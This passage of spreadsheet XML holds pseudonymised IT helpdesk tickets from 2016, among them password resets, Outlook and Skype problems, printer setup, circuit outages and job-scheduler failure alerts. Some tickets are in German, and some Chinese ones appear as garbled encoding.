    <t xml:space="preserve">circuit outage:usa, nv - divestiture site :secondary vpn circuit is down since at 8:04 am et on 08/30.primary is up </t>
  </si>
  <si>
    <t>what type of outage:  _____network     _x____circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___no______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ______8:04 am et on 08/30________________x000D_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</si>
  <si>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SID_11_uacyltoe hxgaycze failed in job_scheduler at: 08/30/2016 07:52:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_11_uacyltoe hxgaycze failed in job_scheduler at: 08/30/2016 07:52:00</t>
  </si>
  <si>
    <t>sn access</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rdfjsawg.zpmxgdcw@gmail.com_x000D_
_x000D_
please add user vvkatts to ticketing_tool erp finance group._x000D_
_x000D_
let me know if you have any questions._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">outlook not loading </t>
  </si>
  <si>
    <t>can't access expense reporting through employee self service</t>
  </si>
  <si>
    <t xml:space="preserve">when trying to enter the expense reporting tab to create a new expense report, a window pops up and says critical runtime error and i can't access the expense reporting page. other aspects of my expense reporting page in employee self service don't work as well. </t>
  </si>
  <si>
    <t>kvtchbus tqrehbsd</t>
  </si>
  <si>
    <t>windows printing issues / need driver installed on every printer but it does not complete successfully.</t>
  </si>
  <si>
    <t>windows printing issues / need driver installed on every printer but it does not complete successfully._x000D_
print server HostName_769.</t>
  </si>
  <si>
    <t xml:space="preserve"> HostName_145: volume comsumed on  /dev/hd3 is more than 85%.</t>
  </si>
  <si>
    <t>gvktqfrj uawjnfel</t>
  </si>
  <si>
    <t>emails are not working</t>
  </si>
  <si>
    <t>impact award password reset.</t>
  </si>
  <si>
    <t>lvqzcdxj gdfivbqc</t>
  </si>
  <si>
    <t>htburown hpkfjqyr</t>
  </si>
  <si>
    <t>password reset through password_management_tool password manager</t>
  </si>
  <si>
    <t xml:space="preserve">ad account lock out </t>
  </si>
  <si>
    <t>account locked out in ad</t>
  </si>
  <si>
    <t>telephony_software 2016 r2 - please can you reset &amp; release my password ?</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: hupnceij.hyozjakb@gmail.com_x000D_
_x000D_
hello all,_x000D_
how are you?_x000D_
_x000D_
telephony_software 2016 r2 - please can you reset &amp; release my password ?_x000D_
_x000D_
sincÃ¨res salutations, best </t>
  </si>
  <si>
    <t>microsoft outlook not work - user bhqvklgc vscdzjhg</t>
  </si>
  <si>
    <t xml:space="preserve">after change the password using password_management_tool, outlook not work.
we've deleted the profiles and reconfigured outlook again, but is asking the password continuously.
user: bhqvklgc vscdzjhg 
e-mail: bhqvklgc.vscdzjhg@gmail.com
user id: marrthyu
computer name: ekbl8111197
</t>
  </si>
  <si>
    <t>piewoyqx bivcmwlh</t>
  </si>
  <si>
    <t>outlook fails to open.</t>
  </si>
  <si>
    <t>aeophctw nvjyhizu</t>
  </si>
  <si>
    <t>circuit outage : company-eu-gbr-united kingdom-dmvpn-1921-rtr01.lookup located at united kingdom is down.</t>
  </si>
  <si>
    <t>circuit outage : company-eu-gbr-united kingdom-dmvpn-1921-rtr01.lookup located at united kingdom went down at 05:13 am et on 08/30.</t>
  </si>
  <si>
    <t>HostName_1010: erpstartsrv.exe service is down.</t>
  </si>
  <si>
    <t xml:space="preserve">erp SID_37 password reset and unlock account request </t>
  </si>
  <si>
    <t>new password for erp SID_37 (bex) needed</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: ptyxefvk.fhazbrwn@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
could you please provide me a new password for bex?_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>ptyxefvk fhazbrwn</t>
  </si>
  <si>
    <t>password expires</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: loqdtrfn.apxmsjkc@gmail.com_x000D_
_x000D_
hello,_x000D_
_x000D_
during my holidays my password expires and i couldn't change this._x000D_
</t>
  </si>
  <si>
    <t>loqdtrfn apxmsjkc</t>
  </si>
  <si>
    <t xml:space="preserve">job HostName_1019fail_vig_uacyltoe hxgaycze failed in job_scheduler at: 08/30/2016 05:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job HostName_1019fail_vig_uacyltoe hxgaycze failed in job_scheduler at: 08/30/2016 05:02:00</t>
  </si>
  <si>
    <t>erp printers ng20 and ng 43 are printing on both sides (erp documents). needs to be changed to single side printing.</t>
  </si>
  <si>
    <t xml:space="preserve">erp printers ng20 and ng 43 are printing on both sides (erp documents). needs to be changed to single side printing._x000D_
users: _x000D_
mxwibrtg qbsmonwv_x000D_
cwfzldts dlmukhyn_x000D_
uxpytsdk kyamilds_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>jcdewsuv mdipqhzx</t>
  </si>
  <si>
    <t>erp SID_34 account unlock.</t>
  </si>
  <si>
    <t>kdeohucw qhxbcfes</t>
  </si>
  <si>
    <t>setup new ws \strahlraum \xaqzisrk ahbgjrqz</t>
  </si>
  <si>
    <t>setup new ws \strahlraum \ujtmipzv cwdzunxs</t>
  </si>
  <si>
    <t>setup new ws \strahlraum \fyedqgzt jdqvuhlr</t>
  </si>
  <si>
    <t>xpmgtlcq ksaefihz</t>
  </si>
  <si>
    <t>vfx3, 4 interco inwarehouse_tools cannot be processed</t>
  </si>
  <si>
    <t xml:space="preserve">error: no number range number has been recorded for billing document xxx_x000D_
_x000D_
inwarehouse_tools  (all sales org 1268)_x000D_
0340093016_x000D_
9239982988_x000D_
0340006052_x000D_
9239997472_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>der drucker druckt nicht \hp 4200 \rfvmeyho qgtxjsdc</t>
  </si>
  <si>
    <t>rfvmeyho qgtxjsdc</t>
  </si>
  <si>
    <t>setup new ws\ rechner alte schmiede \nfayqjhg kyswcpei</t>
  </si>
  <si>
    <t>nfayqjhg kyswcpei</t>
  </si>
  <si>
    <t>unable to print company label</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: rxoynvgi.ntgdsehl@gmail.com_x000D_
_x000D_
hi it team_x000D_
_x000D_
kindly please assist as we unable to print company label._x000D_
no error message prompted, nothing print out from zebra label printer. </t>
  </si>
  <si>
    <t>tablet - dell 7350 - ç”µè„‘æ’­æ”¾éŸ³é¢‘æ–‡ä»¶æ²¡æœ‰å£°éŸ³ã€‚</t>
  </si>
  <si>
    <t>please provide details of the issue._x000D_
ç”µè„‘æ’­æ”¾éŸ³é¢‘æ–‡ä»¶æ²¡æœ‰å£°éŸ³ï¼Œskypeä¹Ÿæ²¡æœ‰å£°éŸ³ã€‚</t>
  </si>
  <si>
    <t>riuhxcab jcsavihq</t>
  </si>
  <si>
    <t>please, reset password erp SID_34 production</t>
  </si>
  <si>
    <t>name:shathyra
language:
browser:microsoft internet explorer
email:gvktqfrj.uawjnfel@gmail.com
customer number:
telephone:+390
summary:please, reset password erp SID_34 production
user grargtzzt</t>
  </si>
  <si>
    <t xml:space="preserve">label printer network lost </t>
  </si>
  <si>
    <t>kiwyjtpu wzjqcnfy</t>
  </si>
  <si>
    <t>iphoneä¸Šçš„skypeä¸èƒ½ç™»å½•ä¸èƒ½å‚åŠ ä¼šè®®ï¼Œè¯·è½¬ç»™å°è´ºã€‚</t>
  </si>
  <si>
    <t>vpnä¸èƒ½ä½¿ç”¨ï¼Œè¯·è½¬ç»™å°è´º</t>
  </si>
  <si>
    <t>not able to enter/ select account asignment category</t>
  </si>
  <si>
    <t>ecfbdmwt dgnoqymj</t>
  </si>
  <si>
    <t>druckerzuordnung zum disponenten</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: icnjlzas.cvphuknj@gmail.com_x000D_
_x000D_
hallo,_x000D_
_x000D_
weil unser erp-drucker rn33 defekt ist, nutzen wir Ã¼bergangsweise den rn26._x000D_
wÃ¼rden sie bitte deshalb alle disponenten im werk plant_223, die momentan dem rn33 zugordnet sind, auf rn26 Ã¤ndern?_x000D_
_x000D_
_x000D_
--_x000D_
mit freundlichen grÃ¼ÃŸen / kind </t>
  </si>
  <si>
    <t>icnjlzas cvphuknj</t>
  </si>
  <si>
    <t xml:space="preserve">job HostName_1019fail failed in job_scheduler at: 08/30/2016 02:03:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job HostName_1019fail failed in job_scheduler at: 08/30/2016 02:03:00</t>
  </si>
  <si>
    <t xml:space="preserve">receiving mails from unknown  </t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: wdybmizf.ekqgpaus@gmail.com_x000D_
_x000D_
hello ,_x000D_
                i am receiving some mails from uperformsystem@ancile.com&lt;mailto:uperformsystem@ancile.com&gt; ,is that a spam mail ?if not , why i am receiving this mails ? please provide the details ._x000D_
_x000D_
[cid:image001.png@01d202af.93870f00]_x000D_
[cid:image002.png@01d202af.93870f00]_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>wdybmizf ekqgpaus</t>
  </si>
  <si>
    <t xml:space="preserve">job bkwin_HostName_768_inc failed in job_scheduler at: 08/30/2016 01:30:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bkwin_HostName_768_inc failed in job_scheduler at: 08/30/2016 01:30:00</t>
  </si>
  <si>
    <t xml:space="preserve">habe gestern mein passwort geÃ¤ndert. nun verbindet sich outlook nicht mit axeclkro.snfmerdb@gmail.com. </t>
  </si>
  <si>
    <t xml:space="preserve">kann anmeldetaten eingeben, aber fenster kommt immer wieder.... anmeldung gelingt nicht._x000D_
heute nochmal passwort geÃ¤ndert. gleiches problem._x000D_
kann outlook nicht nutzen und keine mails bearbeiten._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>axeclkro snfmerdb</t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to shop floor system </t>
  </si>
  <si>
    <t xml:space="preserve">unable to login to shop floor system _x000D_
_x000D_
error:- authentication failed </t>
  </si>
  <si>
    <t>oewrjvcx abjpdkcu</t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_netch_ap1 failed in job_scheduler at: 08/30/2016 01:10:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_ap1 failed in job_scheduler at: 08/30/2016 01:10:00</t>
  </si>
  <si>
    <t>i'm not able to login to skype communicator</t>
  </si>
  <si>
    <t>please help me to set up skype conference calling feature on my company smart phone - i-phone</t>
  </si>
  <si>
    <t>name:nthryitin
language:
browser:netscape
email:dqwhpjxy.pozjxbey@gmail.com
customer number:
telephone:+760
summary:please help me to set up skype conference calling feature on my company smart phone - i-phone</t>
  </si>
  <si>
    <t>engineering tool quick search problem</t>
  </si>
  <si>
    <t xml:space="preserve">engineering tool quick search is not working ,it taking too much time to load the data. please sort out the issue aerp </t>
  </si>
  <si>
    <t xml:space="preserve">the HostName_80 network connection lost at 9:05 am in apac time ,  the connection lost has been going on 10 minutes </t>
  </si>
  <si>
    <t>the HostName_80 connection lost at 9:05 am ,  the connection has been going on 10 minutes ,could you check the reason ,</t>
  </si>
  <si>
    <t>users are unable to "open engg work bench</t>
  </si>
  <si>
    <t>unable to open engineering tool
all user in india plant (150 people)
no error message 
contact no:- 221</t>
  </si>
  <si>
    <t>pdvrieys wxvsltia</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_549 failed in job_scheduler at: 08/29/2016 23:18:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_549 failed in job_scheduler at: 08/29/2016 23:18:00</t>
  </si>
  <si>
    <t xml:space="preserve">job Job_394 failed in job_scheduler at: 08/29/2016 23:00:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job Job_394 failed in job_scheduler at: 08/29/2016 23:00:00</t>
  </si>
  <si>
    <t xml:space="preserve">job pp_EU_tool_netch_keheu2 failed in job_scheduler at: 08/29/2016 22:06:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job pp_EU_tool_netch_keheu2 failed in job_scheduler at: 08/29/2016 22:06:00</t>
  </si>
  <si>
    <t>laptop ä»Žæ¡Œå­ä¸Šé¢æ‘”ä¸‹ï¼Œå¤–å£³æ‘”è£‚ï¼ŒçŽ°åœ¨ä¸èƒ½å¼€æœºã€‚</t>
  </si>
  <si>
    <t>bwjhurqx akyuowev</t>
  </si>
  <si>
    <t>ana pethrywrs call conference to hr support</t>
  </si>
  <si>
    <t>wireless outage again-taiwan 0830</t>
  </si>
  <si>
    <t>é‚®ç®±ç™»å½•ä¸äº†</t>
  </si>
  <si>
    <t>æ˜¨å¤©æç¤ºæ›´æ”¹å¯†ç ï¼Œæ”¹å¥½åŽå¯ä»¥ç™»å½•ï¼Œä»Šå¤©ç™»å½•ä¸äº†ã€‚</t>
  </si>
  <si>
    <t>erp account password reset</t>
  </si>
  <si>
    <t xml:space="preserve">ic
 welcome, our next available agent will be with you shortly...
 interaction alerting agent.
 website visitor has joined the conversation
rakthyesh ramdntythanjesh
 hi vhihrty
sndaofyw jetcxpda
 hello
rakthyesh ramdntythanjesh
 </t>
  </si>
  <si>
    <t xml:space="preserve">job bk_hana_SID_22_os_dly_dp failed in job_scheduler at: 08/29/2016 19:36:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bk_hana_SID_22_os_dly_dp failed in job_scheduler at: 08/29/2016 19:36:00</t>
  </si>
  <si>
    <t xml:space="preserve">ic_x000D_
 welcome, our next available agent will be with you shortly..._x000D_
 interaction alerting agent._x000D_
 agent did not answer.  reassigning your interaction to another agent._x000D_
 interaction alerting agent._x000D_
 website visitor has joined the conversation_x000D_
rakthyesh ramdntythanjesh_x000D_
 hi shaungtyr_x000D_
gwptzvxm rhozsfty_x000D_
 hi_x000D_
rakthyesh ramdntythanjesh_x000D_
 </t>
  </si>
  <si>
    <t>unable to send mails</t>
  </si>
  <si>
    <t xml:space="preserve">ic_x000D_
 welcome, our next available agent will be with you shortly..._x000D_
 interaction alerting agent._x000D_
 website visitor has joined the conversation_x000D_
upcgxthj lnsvemxy_x000D_
 hi, i cant send emails_x000D_
rakthyesh ramdntythanjesh_x000D_
 hi johthryu_x000D_
 </t>
  </si>
  <si>
    <t xml:space="preserve">job bk_hana_SID_61_erp_wky_dp failed in job_scheduler at: 08/29/2016 17:51:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job bk_hana_SID_61_erp_wky_dp failed in job_scheduler at: 08/29/2016 17:51:00</t>
  </si>
  <si>
    <t>s1 to k1 license- ujtmipzv.cwdzunxs@gmail.com</t>
  </si>
  <si>
    <t>s1 to k1 license</t>
  </si>
  <si>
    <t>guest wifi access for lefrte eafrtkin</t>
  </si>
  <si>
    <t>qomancfz esafqznm</t>
  </si>
  <si>
    <t>unable to hear any audio from bluetooth headset through skype call</t>
  </si>
  <si>
    <t>pc restarting randomly. appears to be a possble os issue and/or virus</t>
  </si>
  <si>
    <t>tskwevno sjhpoakl</t>
  </si>
  <si>
    <t>ticket update on inplant_855272</t>
  </si>
  <si>
    <t>vsp computer asset returns</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: owhuxbnf.sxbgyrou@gmail.com
good afternoon,
field sales terminated employees -
doug bise and lance kappel returned their company computer and phone to me at the usx office.  they are sitting in boxes next to my desk.  please arrange to pick them up or let me know how to return them.
owhuxbnf sxbgyrou phr
hr manager, infrastructure
owhuxbnf.sxbgyrou@gmail.com&lt;mailto:owhuxbnf.sxbgyrou@gmail.com&gt;
</t>
  </si>
  <si>
    <t>would like added to the distribution list for job hr330.  xszoedmc.gmhkdsnw@gmail.com 724 usa</t>
  </si>
  <si>
    <t xml:space="preserve">i was receiving job hr301a every monday morning up through and including monday, august 15 (see attached).  i did not receive a report on 8/22 nor today.  today a co-worker advised that report hr330 is now being issued.  hr330 is needed to maintain usage of the purchasing contract management system.  not sure why i was not added to the new job when it replaced hr301a.  it was suggested i open this ticket to get on the distribution list for job hr330._x000D_
</t>
  </si>
  <si>
    <t>user wants to update passwords using password manager link</t>
  </si>
  <si>
    <t>ticket update on inplant_854272</t>
  </si>
  <si>
    <t>rfeqbplo zligwvte</t>
  </si>
  <si>
    <t>map network drives</t>
  </si>
  <si>
    <t>outlook freezes when trying to open a new email templet.</t>
  </si>
  <si>
    <t>msc not communicating with erp</t>
  </si>
  <si>
    <t>name:tmyeqika hfudpeot
language:
browser:microsoft internet explorer
email:lryturhy.galganski@yahoo.com
customer number:
telephone:216 
summary:msc not communicating with erp</t>
  </si>
  <si>
    <t>unable to login to collaboration_platform site from home</t>
  </si>
  <si>
    <t>circuit outage at usa-usa since 08/29 2:00 am et. site is on primary circuit.</t>
  </si>
  <si>
    <t>what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000D_
_x000D_
1. top 23 cert site   ?    ___yes______     (yes/no/na) _x000D_
_x000D_
2. when did it start  ?   ___ 08/29 2:00 am et___________________x000D_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____yes__    (yes/no/na) _x000D_
_x000D_
6. backup circuit active ?   ___yes_____     (yes/no/na) _x000D_
_x000D_
7. site contact notified (phone/email) ?  __yes_______     (yes/no/na) _x000D_
_x000D_
8. remote dial-in ?   ___________   (yes/no/na) _x000D_
_x000D_
9. equipment reset ?    ___________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</si>
  <si>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orders picking confirmed in msc are not confirming as picked in erp. all orders are showing on erp as not confirmed yet.</t>
  </si>
  <si>
    <t>us25- vdklzxqg jpaftdul 66942</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: wvngzrca.sfmrzdth@gmail.com
please activate maintenance employee vdklzxqg jpaftdul 66942 email address. he is part of the maintenance group and will need email communications.
if i may be of further assistance please feel free to contact me at any time.
wvngzrca sfmrzdth, phr
human resources manager
wvngzrca.sfmrzdth@gmail.com&lt;mailto:wvngzrca.sfmrzdth@gmail.com&gt;
</t>
  </si>
  <si>
    <t>ad password reset</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_11_uacyltoe hxgaycze6 failed in job_scheduler at: 08/29/2016 14:02:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_11_uacyltoe hxgaycze6 failed in job_scheduler at: 08/29/2016 14:02:00</t>
  </si>
  <si>
    <t>unable to open outlook after changing the password</t>
  </si>
  <si>
    <t>mhxzdygu qwdjfgbl</t>
  </si>
  <si>
    <t>unable to open ess page from home pc(win10)</t>
  </si>
  <si>
    <t>hr_tool site will not recognize email address after windows 2016 upgrade.</t>
  </si>
  <si>
    <t>tried entering into hr_tool site, but cannot enter because of email address. it did not change, but windows version upgrade from 2010 to 2016.</t>
  </si>
  <si>
    <t>vkpwnqay rmwxqoba</t>
  </si>
  <si>
    <t>hr_tool etime screen will not open to request vacation/time off.</t>
  </si>
  <si>
    <t>xszoedmc gmhkdsnw, 724, hr_tool etime.  blank screen comes up when trying to access. screen shot attached.</t>
  </si>
  <si>
    <t xml:space="preserve">unable to open engineering_engineering_tools from online. </t>
  </si>
  <si>
    <t>unable to open engineering_engineering_tools from online, files which were zipped</t>
  </si>
  <si>
    <t>sagfvdeb kfqtvgxl</t>
  </si>
  <si>
    <t>expense report not working</t>
  </si>
  <si>
    <t xml:space="preserve">when trying to create an expense report in ess i get the following error: "infortype '0017' for 08/29/2016 does not exist for pers. no." i've unlocked my personnel number and nothing changes. </t>
  </si>
  <si>
    <t>govipcda yvgkbitw</t>
  </si>
  <si>
    <t>caller wanted to speak to email server admin, as one of his email his companys email is blocked by company.</t>
  </si>
  <si>
    <t>caller wanted to speak to email server admin, as one of his email his company's email is blocked by company._x000D_
helped user with it email address help@ company.com and asked to send email with screenshot.</t>
  </si>
  <si>
    <t>e-mail question</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: anpocezt.qturbxsg@gmail.com_x000D_
_x000D_
hello_x000D_
i would like to put a ribbon on the bottom of some my e-mail with the attached information, who can i go to for help._x000D_
i would like to make an extra signature with my name (below) and then add the information between my e-mail address and company address._x000D_
_x000D_
_x000D_
best </t>
  </si>
  <si>
    <t>blank call: did not receive any response from other side.</t>
  </si>
  <si>
    <t>office is not licensed</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_11_uacyltoe hxgaycze5 failed in job_scheduler at: 08/29/2016 12:49:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_11_uacyltoe hxgaycze5 failed in job_scheduler at: 08/29/2016 12:49:00</t>
  </si>
  <si>
    <t>need to map printer</t>
  </si>
  <si>
    <t>sayrmutj txwhimlj</t>
  </si>
  <si>
    <t xml:space="preserve">bitte um rÃ¼ckruf morgen um 7 uhr 30 mitteleuropÃ¤ischer zeit </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: ptuchwad.yzvrlcqa@gmail.com
grund: mit neueinstellung outlock 2016 geht vieles nicht mehr
mit freundlichen grÃ¼ssen
-uwe schrÃ¶ck
technische beratung und verkauf
ptuchwad.yzvrlcqa@gmail.com&lt;mailto:ptuchwad.yzvrlcqa@gmail.com&gt;
company deutschland gmbh
geschÃ¤ftsfÃ¼hrer: rfwlsoej yvtjzkaw, phvkowml azbtkqwx, naruedlk mpvhakdq
sitz der gesellschaft: germany/hgermany â€“ registergerirtcht: bad homburg/hgermany  hrb 7492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</si>
  <si>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ptuchwad yzvrlcqa</t>
  </si>
  <si>
    <t>erp access issue : SID_34 access: user id has got locked: kundegty</t>
  </si>
  <si>
    <t>system (SID_34, SID_37, SID_39, SID_38, hrp, other ?): SID_34_x000D_
_x000D_
enter user id of user having the issue:kundegty_x000D_
_x000D_
transaction code(s) the user needs or was working with:_x000D_
_x000D_
describe the issue: id got locked. please release._x000D_
_x000D_
if you are getting a "not authorized" message, recreate the condition then do   /nsu53   and attach result to the ticketing_tool ticket._x000D_
_x000D_
provide access the same as this other user:</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_11_uacyltoe hxgaycze4 failed in job_scheduler at: 08/29/2016 12:30:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_11_uacyltoe hxgaycze4 failed in job_scheduler at: 08/29/2016 12:30:00</t>
  </si>
  <si>
    <t>tool performance database</t>
  </si>
  <si>
    <t>please deactivate userid kroetzer in engineering_tool database</t>
  </si>
  <si>
    <t xml:space="preserve">unable to see expense report 2111137500 </t>
  </si>
  <si>
    <t xml:space="preserve">from: proygkjt mwetuhqf 
sent: sunday, august 28, 2016 7:11 pm
to: nwfodmhc exurcwkm
cc: ifblxjmc dyrgfwbm; callie pollaurid
subject: re: expense report 2111137500 has been submitted.
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
-----original message-----
from: workflow system [mailto:wf-batch@company.com] 
sent: friday, august 26, 2016 6:14 pm
to: proygkjt mwetuhqf &lt;proygkjt.mwetuhqf@gmail.com&gt;
subject: expense report 2111137500 has been submitted.
the following expense report has been submitted for your approval:
personnel no.:    1215619280  (jeffrghryeyrghryey a strgrtyiet)
expense report no.:    2111137500
start date:    25.07.2016 08:00:00
end date:    24.08.2016 17:00:00
total costs:    usd 1.141,89
reimbursement amount:    usd 1.141,89
to review this expense report in full, please log into your universal worklist on manager self-service.
</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_11_uacyltoe hxgaycze3 failed in job_scheduler at: 08/29/2016 12:15:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_11_uacyltoe hxgaycze3 failed in job_scheduler at: 08/29/2016 12:15:00</t>
  </si>
  <si>
    <t xml:space="preserve">zdsxmcwu thdjzolwronization issue </t>
  </si>
  <si>
    <t>zdsxmcwu thdjzolwronization issue.</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_11_uacyltoe hxgaycze2 failed in job_scheduler at: 08/29/2016 12:07:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_11_uacyltoe hxgaycze2 failed in job_scheduler at: 08/29/2016 12:07:00</t>
  </si>
  <si>
    <t xml:space="preserve">outlook crashing : msd crm outlook  issue </t>
  </si>
  <si>
    <t>outlook freezing frequently</t>
  </si>
  <si>
    <t xml:space="preserve">user called in for an issue where his outlook was freezing frequently. </t>
  </si>
  <si>
    <t>pnwcubqr qdlocnzt</t>
  </si>
  <si>
    <t>add im:mfg_planner_reference to the miiadmin erp SID_34 and SID_1 ids.</t>
  </si>
  <si>
    <t xml:space="preserve">add im:mfg_planner_reference to the miiadmin erp SID_34 and SID_1 ids.   this is needed so the system will automatically backflush and close the production order. </t>
  </si>
  <si>
    <t xml:space="preserve">
received from: aiobpkzm.rmfjwtpl@gmail.com
hi i need access to SID_1 could you please help me
[cid:image001.png@01d201e3.deee0330]
saludos !!!
jorghge ramdntyfon abrurto tsantamaria.
supervisor credit &amp; ar finance.
aiobpkzm.rmfjwtpl@gmail.com&lt;mailto:aiobpkzm.rmfjwtpl@gmail.com&gt;.
[cid:image004.jpg@01cfa5c4.9dSID_35e40]
</t>
  </si>
  <si>
    <t>aiobpkzm rmfjwtpl</t>
  </si>
  <si>
    <t>unable to open outlook and skype</t>
  </si>
  <si>
    <t>name:phil schoenfeld
language:
browser:microsoft internet explorer
email:iotudrxg.odpcwvez@gmail.com
customer number:
telephone:330
summary:can not open outlook and can not sign into skype for business</t>
  </si>
  <si>
    <t>keybankrd</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: qscdktvl.rihendxu@gmail.com_x000D_
_x000D_
could i please have a new keybankrd.  my letters are worn off the one i have._x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>vip 2 please add luis revilla to the group ltaballallcompanycm to access reporting_engineering_tools</t>
  </si>
  <si>
    <t xml:space="preserve">
received from: tivbxojn.gorlajmp@gmail.com
nicrhty pfgyhtu
vice president, indirect sales
industrial business segment
tivbxojn.gorlajmp@gmail.com&lt;mailto:tivbxojn.gorlajmp@gmail.com&gt;
</t>
  </si>
  <si>
    <t>companyguest access</t>
  </si>
  <si>
    <t>name:erirtc 
language:
browser:microsoft internet explorer
email:dabhruji
customer number:
telephone:724
summary:
hi erirtc,
wifi access for the following is not working:
dtbycsgf vfdglqnp
saztolpx xqgovpik</t>
  </si>
  <si>
    <t xml:space="preserve">job SID_11_uacyltoe hxgaycze failed in job_scheduler at: 08/29/2016 11:04:00  </t>
  </si>
  <si>
    <t>received from: monitoring_tool@company.com_x000D_
_x000D_
job SID_11_uacyltoe hxgaycze failed in job_scheduler at: 08/29/2016 11:04:00</t>
  </si>
  <si>
    <t>company iphone</t>
  </si>
  <si>
    <t xml:space="preserve">from: aorthyme rnsuipbk 
sent: monday, august 29, 2016 8:34 pm
to: badgknqs xwelumfz
subject: company iphone
hi pollaurid,
this is regarding your mobile phone that needs to changed. 
please call vendor at this number 999. 
this should be the best choice to get the issue fixed.
</t>
  </si>
  <si>
    <t>subject: account information updated  from uperform : spam queries</t>
  </si>
  <si>
    <t xml:space="preserve">unable to load crm add in on outlook </t>
  </si>
  <si>
    <t>subject: account information updated  from uperform : spam querries</t>
  </si>
  <si>
    <t>mobile device activation company device</t>
  </si>
  <si>
    <t>send function is not working. (outlook 2010)</t>
  </si>
  <si>
    <t>outlook is not working.</t>
  </si>
  <si>
    <t>password reset request by ughzilfm cfibdamq.</t>
  </si>
  <si>
    <t>ompeztak ilkpqtjh</t>
  </si>
  <si>
    <t>accounts erstellen bitte</t>
  </si>
  <si>
    <t xml:space="preserve">von: gogtyekhan merdivan 
gesendet: montag, 29. august 2016 11:45
an: ughzilfm cfibdamq
betreff: accounts erstellen bitte
hallo ,
bitte accounts erstellen fÃ¼r 3 mitarbeiter.
ujtmipzv cwdzunxs, xaqzisrk ahbgjrqz, fyedqgzt jdqvuhlr.
diese mitarbeiter haben noch kein anmeldeaccount.
mit freundlichen grÃ¼ÃŸen
b.eng. qidgvtwa qvbutayx
leitung strahlen / supervisor blasting
qidgvtwa.qvbutayx@gmail.com
geschÃ¤ftsfÃ¼hrer/managing directors:  phvkowml azbtkqwx, naruedlk mpvhakdq
sitz/registered office: germany - registergerirtcht/listed in the court register
persÃ¶nlich haftende gesellschafterin/general partner: company company beteiligungs gmbh
sitz/registered office: fÃ¼rth/bay. - registergerirtcht/listed in the court regster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t>
  </si>
  <si>
    <t>need the bex analysis add-in</t>
  </si>
  <si>
    <t>failed skype mtg.</t>
  </si>
  <si>
    <t xml:space="preserve">_x000D_
_x000D_
received from: yiramdntyjqc.qtrcepsa@gmail.com_x000D_
_x000D_
dear it,_x000D_
i tried to join a s&amp;op forecasting training session today but could not see the presenter's screen. below is the link, the training has been rescheduled for this coming friday. is there anything i can check before friday to insure i don't have this problem again?_x000D_
</t>
  </si>
  <si>
    <t>adding members to shared mailbox groups</t>
  </si>
  <si>
    <t>adding members to the shared mailbox group</t>
  </si>
  <si>
    <t>prtgghj4k and SID_67 password reset</t>
  </si>
  <si>
    <t>unable to login to prtgghj4k and SID_67 systems</t>
  </si>
  <si>
    <t>wifi not working.</t>
  </si>
  <si>
    <t>tbjcygrn megaypdn</t>
  </si>
  <si>
    <t>need initial password reset for erp prtgghj4k (hr_tool) module</t>
  </si>
  <si>
    <t>laptop will not turn on, either docked or un-docked while connected to ac or just on battery.</t>
  </si>
  <si>
    <t>eqcudbks zbjeqruy</t>
  </si>
  <si>
    <t>once external monitor is not working and the other is flickering.</t>
  </si>
  <si>
    <t>raosetuv hmgwrkzb</t>
  </si>
  <si>
    <t>mzqgobhv pebimhfz</t>
  </si>
  <si>
